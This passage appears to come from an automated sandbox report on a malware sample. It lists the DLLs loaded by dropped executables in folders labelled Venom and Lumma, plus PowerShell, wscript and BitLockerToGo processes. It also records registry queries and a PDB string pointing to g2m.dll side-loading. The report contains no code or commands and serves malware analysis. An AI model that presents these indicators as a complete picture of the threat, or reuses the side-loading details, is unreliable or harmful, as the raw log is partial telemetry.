                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: sxs.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: mshtml.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: powrprof.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: wkscli.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: umpdc.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: srpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: msiso.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: uiautomationcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: wintypes.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: g2m.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: cryptnet.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: webio.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: cabinet.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: sxs.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: devenum.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: devobj.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: msdmo.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: avicap32.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: msvfw32.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: g2m.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: webio.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: g2m.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeAutomated click: OK
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\Desktop\7Y18r(14).exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: Binary string: rust_dave_sideload.pdb source: vm.exe, 00000025.00000002.3761757300.0000000070078000.00000002.00000001.01000000.00000018.sdmp, lm.exe, 00000026.00000002.2910739213.0000000070008000.00000002.00000001.01000000.00000019.sdmp, vm.exe, 0000002B.00000002.2941431494.0000000070078000.00000002.00000001.01000000.00000018.sdmp, g2m.dll.32.dr, g2m.dll0.32.dr
